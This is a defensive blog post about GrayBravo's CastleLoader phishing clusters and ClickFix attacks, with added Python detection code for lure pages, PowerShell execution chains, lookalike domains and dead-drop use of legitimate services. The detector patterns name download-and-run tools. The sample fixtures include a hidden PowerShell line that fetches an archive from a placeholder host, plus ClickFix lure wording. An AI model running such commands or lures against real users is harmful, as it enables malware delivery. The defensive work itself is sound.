GrayBravo’s CastleLoader clusters show MaaS phishing at scale. Learn how AI detects ClickFix, tracks infrastructure, and stops loader campaigns earlier.

AI Defense Against CastleLoader Phishing Clusters
GrayBravo didn’t just build malware. It built a repeatable business.
In late 2025, threat intelligence teams tracked GrayBravo (previously TAG-150) as it expanded fast, shifted tactics when exposed, and operated a sprawling, multi-tier infrastructure. The detail that should make defenders sit up: researchers identified four distinct activity clusters using GrayBravo’s CastleLoader—each with different lures, infrastructure patterns, and “customer-like” behaviors. That’s the operational footprint you expect when a group is running a malware-as-a-service (MaaS) ecosystem.
This matters because CastleLoader isn’t the end of the story. It’s a delivery layer. Once it lands, it can bring in credential stealers, remote access trojans (RATs), or other loaders—meaning a single click can become ransomware, business email compromise, cargo theft, or quiet long-term access.
Why GrayBravo’s clusters are a warning sign
GrayBravo’s CastleLoader activity is a warning sign because it shows how quickly modern initial access evolves when a MaaS platform gets traction.
Traditional security planning assumes: one actor, one campaign, one set of indicators. GrayBravo flips that. You’re dealing with:
- Multiple operators using the same loader
- Different phishing themes (logistics vs. hospitality)
- Different delivery channels (phishing, ClickFix, malvertising, fake software updates)
- Shared enabling infrastructure patterns (multi-tier C2, bulletproof hosting ecosystems, legitimate internet services used as cover)
When a loader becomes “popular,” defenders lose the comfort of stable signatures. The reliable signal shifts from specific hashes to behavioral patterns: how domains are registered, how redirects are generated, how commands are executed, how C2 redundancy works, and how victims are selected.
The operational pattern defenders should internalize
Here’s the pattern I’ve seen repeatedly when a MaaS ecosystem matures:
- The loader stabilizes (CastleLoader becomes the “product”).
- Affiliates diversify lures (logistics quotes, Booking.com messages, software installers).
- Infrastructure becomes layered (tiers, backups, redundancy).
- Defense evasion becomes productized (signed installers, “legitimate” services as dead drops).
That’s not just a technical evolution. It’s a scaling strategy.
The ClickFix problem: social engineering that exploits your tools
ClickFix-style attacks work because they turn a victim into an execution engine.
Instead of exploiting a browser zero-day, the attacker convinces a user to copy/paste a command (often PowerShell) and run it under the pretense of “fixing access” or “completing verification.” It’s effective because it bypasses a lot of classic email defenses:
- The email can look normal (no attachment).
- The landing page can look normal (brand logos, plausible workflow).
- The malicious act happens when the user runs a command.
GrayBravo-linked clusters used ClickFix to deliver CastleLoader and other payloads—sometimes chaining into additional malware families like infostealers and RATs.
Why AI helps here (and rule-only defenses struggle)
Static rules can catch some ClickFix pages, but operators constantly adjust wording, page layouts, domains, and redirect chains.
AI-based detection does better when it’s trained to recognize the intent of the interaction. Specifically:
- Natural language patterns common to ClickFix (“copy and paste,” “run in PowerShell,” “verification steps,” “token missing,” “link expiring soon”)
- Page behavior (form submit → instruction overlay → command reveal)
- Execution telemetry correlation (browser activity followed by PowerShell spawning curl, tar, pythonw.exe, or Defender exclusion changes)
A practical stance: if you’re still treating phishing as a pure “email gateway” problem, you’ll keep losing to ClickFix. You need browser, endpoint, and identity telemetry stitched together—and AI is often the only realistic way to do that at scale.
What the four CastleLoader clusters tell us about real-world targeting
These clusters aren’t just “interesting.” They show how attackers tailor operations to industries and workflows.
Cluster 1 (logistics): lures that match how freight actually works
The logistics-focused cluster (tracked as TAG-160) impersonated logistics firms, spoofed emails, and abused freight-matching platforms. The lure style is brutally practical: rate confirmations, freight quotes, and urgency (“link will expire”).
This is targeted phishing that understands operations. It also reflects a broader trend security teams in logistics have been dealing with: cybercrime that directly enables physical theft (shipment hijacking, fraudulent pickups, and payment diversion).
Where AI earns its keep in this scenario:
- Vendor and sender verification at scale: models can learn normal freight partner communication patterns (domains, sending cadence, phrasing, file/link patterns).
- Anomaly detection on platform workflows: when accounts on freight platforms behave differently (new accounts contacting many carriers, unusual message templates, abnormal login geographies).
- Thread and relationship analysis: detecting when a “new conversation” mimics a known vendor but lacks the usual context, reply chain, or historical relationship.
Cluster 2 (Booking.com): phishing operations with a management stack
The Booking.com-themed cluster (TAG-161) is notable because it wasn’t just sending emails; it had dedicated phishing email management tooling—panels for redirects, SMTP pools, proxy configuration, templating, and stats.
That tells you this isn’t a one-off phisher. It’s a campaign operator optimizing for throughput.
AI-driven threat intelligence shines here by clustering infrastructure and behavior:
- Grouping domains by registration fingerprints and hosting ranges
- Identifying redirect generation patterns
- Spotting shared naming conventions across campaigns
- Surfacing new infrastructure quickly when the actor rotates domains
If you want a crisp one-liner to align your team: MaaS isn’t dangerous because it exists; it’s dangerous because it turns good operators into scalable operators.
Cluster 3 (Booking.com again): dead drops on legitimate platforms
A separate Booking.com impersonation cluster used Steam Community profiles as a dead drop resolver—an approach that helps attackers change C2 targets without shipping new binaries.
This is the kind of tactic that breaks “block the domain” playbooks. The domain you block today may not be the domain the malware uses tomorrow.
AI helps by focusing on:
- Graph relationships (which endpoints contacted which Steam profiles, which domains were resolved after those lookups)
- Sequence analysis (browser → PowerShell → repeated Defender exclusion attempts → loader execution)
- Outlier detection (endpoints that suddenly start interacting with unusual legitimate services in rare ways)
Cluster 4 (malvertising + fake installers): signed malware is the new normal
The malvertising/fake software update cluster distributed CastleLoader via fake repositories and electronically signed MSI installers, including builds associated with Extended Validation certificates.
This is where many organizations still get it wrong: they treat “signed” as “safe.”
Signed software can be malicious. What matters is:
- Who signed it (reputation, history)
- Where it came from (distribution channel)
- What it does after launch (process tree, network beacons, file writes)
AI-based endpoint analytics is good at detecting this because it can compare installers against baselines: normal installer behavior doesn’t typically involve suspicious outbound beacons, rapid follow-on script execution, or unusual persistence actions.
Turning threat intel into AI action: a practical playbook
Most teams collect intelligence. Fewer teams operationalize it.
Here’s a pragmatic way to turn this kind of CastleLoader reporting into measurable defense improvements.
1) Build “phishing intent” detection, not just URL detection
Answer first: Detect the instruction pattern, not only the destination.
Add detections for:
- Pages that instruct users to copy/paste commands
- Emails that create urgency around expiring links + document viewing
- Branded flows that suddenly require “manual verification steps”
AI/NLP can score messages and pages for these patterns, then route them to stepped-up controls (sandboxing, link isolation, user challenge flows).
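The "phishing intent" scoring described here and in the earlier ClickFix section can be prototyped without a trained model: score the instruction pattern (copy/paste, run in PowerShell, verification steps, missing token, expiring link) plus whether the page actually reveals a command. The following is an added example, not code from the original article or from any vendor; the phrase families follow the article's list, while the regexes, weights, thresholds and the two sample texts are constructed assumptions.

```python
"""
Added example: lexical ClickFix "intent" scorer for page text or email bodies.
Phrase families follow the article; weights/thresholds are illustrative assumptions.
"""
import re
from dataclasses import dataclass, field

# Each family: (regex, weight). Weights are assumptions, not a tuned model.
INTENT_PATTERNS = {
    "copy_paste":    (r"\b(copy|paste)\b.{0,40}\b(command|code|text)\b", 2.0),
    "run_shell":     (r"\b(run|execute|open)\b.{0,30}\b(powershell|terminal|run dialog|win\s*\+\s*r)\b", 2.5),
    "verification":  (r"\b(verification|verify|human check|captcha)\b.{0,40}\b(step|steps|complete|manually)\b", 1.5),
    "token_missing": (r"\b(token|session|access)\b.{0,20}\b(missing|expired|invalid)\b", 1.5),
    "urgency":       (r"\b(link|document|invoice|quote)\b.{0,30}\b(expir(e|es|ing)|within \d+ (hours?|minutes?))\b", 1.0),
}

# A revealed command (an interpreter name followed by a switch, or a download cmdlet)
# is the strongest single signal: the page hands the user something to execute.
COMMAND_REVEAL = re.compile(
    r"(powershell(\.exe)?\s+-\w+|cmd(\.exe)?\s*/c\s|mshta\s+\S+|curl\s+-\w+"
    r"|\biwr\s+\S+|invoke-webrequest\b|\biex\b|invoke-expression\b)"
)

@dataclass
class IntentScore:
    score: float
    hits: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # Thresholds are assumptions; tune against your own mail/web corpus.
        if self.score >= 4.0:
            return "high"
        if self.score >= 2.0:
            return "medium"
        return "low"

def score_text(text: str) -> IntentScore:
    """Score one page/email body for ClickFix-style instruction intent."""
    flat = re.sub(r"\s+", " ", text).lower()      # collapse layout whitespace
    result = IntentScore(0.0)
    for name, (pattern, weight) in INTENT_PATTERNS.items():
        if re.search(pattern, flat):
            result.score += weight
            result.hits.append(name)
    if COMMAND_REVEAL.search(flat):
        result.score += 3.0
        result.hits.append("command_reveal")
    return result

# Constructed sample inputs (not real campaign text). The command is a non-functional placeholder.
CLICKFIX_PAGE = """
Human verification required. Complete the verification steps manually:
press Win + R, copy and paste the command below, then run it in PowerShell.
Your access token is missing; this link will expire within 10 minutes.
powershell -ExecutionPolicy Bypass -Command <constructed placeholder>
"""
BENIGN_EMAIL = """
Thanks for your booking. Your reservation confirmation is attached.
Please copy the reservation number into our website to view details.
"""

if __name__ == "__main__":
    for label, sample in (("clickfix", CLICKFIX_PAGE), ("benign", BENIGN_EMAIL)):
        r = score_text(sample)
        print(f"{label}: verdict={r.verdict} score={r.score} hits={r.hits}")
```

A "high" verdict is the routing signal the step above describes: send the message or page to sandboxing, link isolation or a user challenge rather than blocking on the destination URL alone.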
2) Correlate browser-to-endpoint execution chains
Answer first: ClickFix becomes obvious when you connect the dots.
High-confidence correlation patterns include:
- A user visits a newly-seen domain → within minutes PowerShell runs
- PowerShell downloads archives or scripts → execution via pythonw.exe or .NET loaders
- Defender exclusions are modified repeatedly or via unusual loops
This is where machine learning-based correlation (or at least strong graph analytics) beats siloed alerts.
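The correlation patterns listed in this step (and the "execution telemetry correlation" bullet in the ClickFix section) can be expressed as a stage machine over browser, process and Defender-exclusion events per host. The block below is an added example, not code from the article or from any EDR product; the event shape, the five-minute window, the "repeated" threshold of two exclusion changes, the tool and loader name lists, and the sample events are all constructed assumptions.

```python
"""
Added example: per-host correlator for the browser -> PowerShell -> download ->
follow-on loader -> repeated Defender exclusion chain. Event format, window and
thresholds are assumptions; sample events are constructed, not real telemetry.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)            # newly-seen domain -> PowerShell spawn
EXCLUSION_REPEAT_THRESHOLD = 2           # what counts as "repeated" exclusion changes
DOWNLOAD_TOOLS = {"curl", "tar", "iwr", "invoke-webrequest", "bitsadmin", "expand-archive"}
FOLLOW_ON_LOADERS = {"pythonw.exe", "python.exe", "regasm.exe", "regsvcs.exe",
                     "installutil.exe", "msbuild.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

def _ts(s):
    return datetime.fromisoformat(s)

def _tokens(cmdline):
    # Token match rather than substring match so "start"/"target" do not hit "tar".
    return set(re.findall(r"[a-z][\w\-\.]*", cmdline.lower()))

def correlate_clickfix(events):
    """Return {host: {"stages": [...], "score": n}} for hosts showing any chain stage."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
    findings = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: _ts(e["ts"]))
        stages = set()
        new_domain_times = [_ts(e["ts"]) for e in evs
                            if e["type"] == "web" and e.get("first_seen")]
        exclusions = 0
        for e in evs:
            t = _ts(e["ts"])
            if e["type"] == "process":
                image = e["image"].lower()
                parent = e.get("parent", "").lower()
                if image == "powershell.exe":
                    # Either the browser is the parent, or the spawn follows a first-seen domain closely.
                    if parent in BROWSERS or any(timedelta(0) <= t - nd <= WINDOW for nd in new_domain_times):
                        stages.add("browser_to_powershell")
                    if _tokens(e.get("cmdline", "")) & DOWNLOAD_TOOLS:
                        stages.add("download_or_archive")
                elif image in FOLLOW_ON_LOADERS and (parent == "powershell.exe"
                                                     or "browser_to_powershell" in stages):
                    stages.add("follow_on_loader")
            elif e["type"] == "defender_exclusion":
                exclusions += 1
                if exclusions >= EXCLUSION_REPEAT_THRESHOLD:
                    stages.add("repeated_exclusions")
        if stages:
            findings[host] = {"stages": sorted(stages), "score": len(stages)}
    return findings

# Constructed sample telemetry: WS-07 follows the ClickFix chain, WS-12 is routine admin scripting.
SAMPLE_EVENTS = [
    {"ts": "2025-11-03T09:00:00", "host": "WS-07", "type": "web", "domain": "verify-docs.invalid", "first_seen": True},
    {"ts": "2025-11-03T09:02:10", "host": "WS-07", "type": "process", "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr https://placeholder.invalid/pkg.tar -OutFile pkg.tar; tar -xf pkg.tar"'},
    {"ts": "2025-11-03T09:02:40", "host": "WS-07", "type": "defender_exclusion", "path": "C:\\Users\\u\\AppData\\Local\\Temp"},
    {"ts": "2025-11-03T09:02:41", "host": "WS-07", "type": "defender_exclusion", "path": "C:\\Users\\u\\AppData\\Local\\Temp"},
    {"ts": "2025-11-03T09:03:05", "host": "WS-07", "type": "process", "image": "pythonw.exe", "parent": "powershell.exe",
     "cmdline": "pythonw.exe stage2.pyc"},
    {"ts": "2025-11-03T09:00:00", "host": "WS-12", "type": "web", "domain": "intranet.example", "first_seen": False},
    {"ts": "2025-11-03T09:10:00", "host": "WS-12", "type": "process", "image": "powershell.exe", "parent": "cmd.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"ts": "2025-11-03T09:11:00", "host": "WS-12", "type": "defender_exclusion", "path": "D:\\backup"},
]

if __name__ == "__main__":
    for host, f in correlate_clickfix(SAMPLE_EVENTS).items():
        print(host, f)
```

The score is simply the number of chain stages observed; a real deployment would weight stages and tie the alert back to the browser visit so analysts see the lure, not just the PowerShell process.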
3) Use AI to maintain infrastructure blocklists without burning out analysts
Answer first: IoCs decay fast; infrastructure behavior doesn’t.
Instead of asking analysts to chase every new domain, train models (or use vendor AI) to automatically:
- Cluster domains by DNS/WHOIS/hosting patterns
- Detect “typosquat + brand + workflow keyword” combinations
- Flag suspicious use of specific hosting ecosystems associated with repeated abuse
Then gate that intelligence into:
- Secure web gateways / DNS filtering
- Email security policies
- EDR network prevention
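Two of the clustering tasks named in this step and in the TAG-161 discussion (grouping domains by registration fingerprint and hosting range, and flagging "typosquat + brand + workflow keyword" combinations) are shown below as an added example; it is not code from the article or from a threat-intelligence vendor. The record shape stands in for WHOIS/passive-DNS enrichment, the brand and keyword lists are assumptions (only the Booking.com brand comes from the article), and every domain, registrar, nameserver and ASN value is a constructed placeholder.

```python
"""
Added example: fingerprint-based domain clustering plus brand/typosquat + workflow
keyword flagging. Record fields, brand/keyword lists and all sample values are
constructed assumptions.
"""
from collections import defaultdict

BRANDS = ("booking", "dhl", "fedex")          # "booking" from the article; the others assumed
WORKFLOW_WORDS = ("verify", "secure", "confirm", "quote", "rate", "login", "update", "guest")

def fingerprint(rec):
    """Registration/hosting fingerprint: registrar, nameserver set, ASN, cert issuer."""
    return (rec["registrar"].lower(),
            tuple(sorted(ns.lower() for ns in rec["nameservers"])),
            rec["asn"],
            rec.get("cert_issuer", "").lower())

def cluster_by_fingerprint(records):
    """Group domains that share the same fingerprint (shared enabling infrastructure)."""
    clusters = defaultdict(list)
    for rec in records:
        clusters[fingerprint(rec)].append(rec["domain"])
    return dict(clusters)

def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def brand_lookalike(label):
    """Return the brand a label contains or imitates within one edit, else None."""
    for brand in BRANDS:
        if brand in label:
            return brand
        for i in range(0, max(1, len(label) - len(brand) + 2)):
            window = label[i:i + len(brand)]
            if len(window) >= len(brand) - 1 and edit_distance(window, brand) == 1:
                return brand
    return None

def flag_domain(domain):
    """Suspicious only when a brand lookalike AND a workflow keyword co-occur in the label."""
    label = domain.split(".")[0]   # simplification; production code would use the public suffix list
    brand = brand_lookalike(label)
    words = [w for w in WORKFLOW_WORDS if w in label]
    return {"domain": domain, "brand": brand, "workflow_words": words,
            "suspicious": brand is not None and bool(words)}

# Constructed enrichment records (placeholders, not real registrations). ASN 64496 is a documentation ASN.
SAMPLE_RECORDS = [
    {"domain": "booking-guest-verify.com", "registrar": "RegistrarA", "asn": 64496,
     "nameservers": ["ns1.dns-host.invalid", "ns2.dns-host.invalid"], "cert_issuer": "IssuerX"},
    {"domain": "secure-bookinq.net", "registrar": "registrara", "asn": 64496,
     "nameservers": ["NS2.dns-host.invalid", "NS1.dns-host.invalid"], "cert_issuer": "IssuerX"},
    {"domain": "bookinq-confirm.info", "registrar": "RegistrarB", "asn": 64497,
     "nameservers": ["ns1.other-dns.invalid"], "cert_issuer": "IssuerY"},
    {"domain": "intranet.example", "registrar": "RegistrarC", "asn": 64498,
     "nameservers": ["ns1.corp.invalid"], "cert_issuer": "IssuerZ"},
]

if __name__ == "__main__":
    for fp, domains in cluster_by_fingerprint(SAMPLE_RECORDS).items():
        print(len(domains), "domain(s) on fingerprint", fp[0], fp[2], "->", domains)
    for rec in SAMPLE_RECORDS:
        print(flag_domain(rec["domain"]))
```

Note the two-part test in `flag_domain`: a brand name alone (a legitimate partner site might contain it) does not trigger, and a workflow word alone does not either; the combination is what the article describes, and the fingerprint cluster is what lets a newly rotated domain inherit the reputation of the infrastructure it shares.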
4) Monitor “unusual legitimate internet services” usage
Answer first: Attackers love hiding in normal-looking services.
If you only look for obviously malicious domains, you’ll miss:
- Dead drops hosted on community/profile platforms
- Payload staging on file-sharing services
- Paste-style services used for configuration or redirects
AI helps by learning your organization’s normal usage of these services and flagging deviations (new endpoints, odd request patterns, unusual timing).
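Learning "normal" use of legitimate services and flagging deviations can start as a simple baseline of which endpoints talk to which service categories, scored against how the new request was made. The block below is an added example rather than code from the article; the watched-service list, the reasons and alert threshold, the user-agent heuristics and the baseline and new events are constructed assumptions (only the Steam Community dead-drop scenario comes from the article).

```python
"""
Added example: per-host baseline of legitimate-service usage and deviation scoring
(new for host, rare org-wide, non-browser client, scripting-host process).
Service list, thresholds and all sample events are constructed assumptions.
"""
from collections import defaultdict

WATCHED_SERVICES = {                     # services attackers reuse as cover, per the article
    "steamcommunity.com": "community_profile",
    "pastebin.com": "paste",
    "github.com": "code_hosting",
}
BROWSER_UAS = ("mozilla/", "chrome/", "edg/")
SCRIPT_HOSTS = {"powershell.exe", "pythonw.exe", "rundll32.exe", "mshta.exe"}
RARE_FRACTION = 0.05                     # assumption: <5% of hosts => rare org-wide
ALERT_MIN_REASONS = 3                    # assumption: three independent oddities => alert

def _category(sni):
    sni = sni.lower()
    for dom, cat in WATCHED_SERVICES.items():
        if sni == dom or sni.endswith("." + dom):
            return cat
    return None

def build_baseline(events):
    """Return (baseline[host] -> set of categories, prevalence[category] -> host count, host_count)."""
    baseline = defaultdict(set)
    for e in events:
        cat = _category(e["sni"])
        if cat:
            baseline[e["host"]].add(cat)
    prevalence = defaultdict(int)
    for cats in baseline.values():
        for c in cats:
            prevalence[c] += 1
    return baseline, prevalence, len(baseline)

def score_event(e, baseline, prevalence, host_count):
    """Score one new TLS/HTTP event against the baseline; None if the service is not watched."""
    cat = _category(e["sni"])
    if not cat:
        return None
    reasons = []
    if cat not in baseline.get(e["host"], set()):
        reasons.append("new_for_host")
    if prevalence.get(cat, 0) / max(host_count, 1) < RARE_FRACTION:
        reasons.append("rare_org_wide")
    ua = e.get("user_agent", "").lower()
    if not any(b in ua for b in BROWSER_UAS):
        reasons.append("non_browser_client")
    if e.get("process", "").lower() in SCRIPT_HOSTS:
        reasons.append("scripting_host_process")
    return {"host": e["host"], "service": cat, "reasons": reasons,
            "alert": len(reasons) >= ALERT_MIN_REASONS}

# Constructed baseline: 40 workstations use code hosting from a browser; one also browses Steam Community.
BASELINE_EVENTS = [
    {"host": f"WS-{i:02d}", "sni": "github.com", "user_agent": "Mozilla/5.0 Chrome/120", "process": "chrome.exe"}
    for i in range(1, 41)
]
BASELINE_EVENTS.append({"host": "WS-03", "sni": "steamcommunity.com",
                        "user_agent": "Mozilla/5.0 Chrome/120", "process": "chrome.exe"})

# Constructed new events: a profile fetch from PowerShell on a host that never used the service, and two normal ones.
NEW_EVENTS = [
    {"host": "WS-17", "sni": "steamcommunity.com", "user_agent": "", "process": "powershell.exe"},
    {"host": "WS-03", "sni": "steamcommunity.com", "user_agent": "Mozilla/5.0 Chrome/120", "process": "chrome.exe"},
    {"host": "WS-17", "sni": "github.com", "user_agent": "Mozilla/5.0 Chrome/120", "process": "chrome.exe"},
]

if __name__ == "__main__":
    baseline, prevalence, n = build_baseline(BASELINE_EVENTS)
    for ev in NEW_EVENTS:
        print(score_event(ev, baseline, prevalence, n))
```

The dead-drop case stands out not because the destination is malicious (it is a legitimate platform) but because the combination of "first time for this host", "rare across the fleet" and "fetched by a scripting host without a browser user agent" is what normal use of that service never looks like.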
People also ask: “If this is MaaS, why don’t we see clear ads?”
You don’t need public advertisements to have a MaaS ecosystem.
Some operators sell via private relationships, closed forums, invite-only channels, or “service-like” partnerships where the same developer runs the backend while multiple affiliates run campaigns. The practical point for defenders is unchanged: expect multiple clusters, not one campaign, and plan detections accordingly.
What to do next if you’re defending against CastleLoader-style threats
If you want to reduce risk quickly, focus on controls that break the chain early.
- Disable or restrict unnecessary script execution (especially PowerShell for non-admin users).
- Harden email + browser isolation for high-risk roles (finance, operations, dispatch, customer service).
- Deploy behavior-based EDR detections for:
  - suspicious archive downloads followed by execution
  - rapid Defender exclusion modifications
  - uncommon parent/child process trees (Office/browser → PowerShell → interpreter)
- Run a tabletop exercise specifically for ClickFix: what happens when a user runs a pasted command?
For teams actively building an AI-in-cybersecurity program, this is an ideal use case: the signals are multi-source, noisy, and fast-changing, which is exactly where AI-driven detection and triage consistently outperform manual-only workflows.
GrayBravo’s CastleLoader clusters are a reminder that attackers are scaling operations like a business. Defenders need to respond the same way: treat detections as products, automate what can be automated, and use AI where humans simply can’t keep up.
What part of your environment would fail first in a ClickFix scenario—email controls, endpoint controls, or identity controls?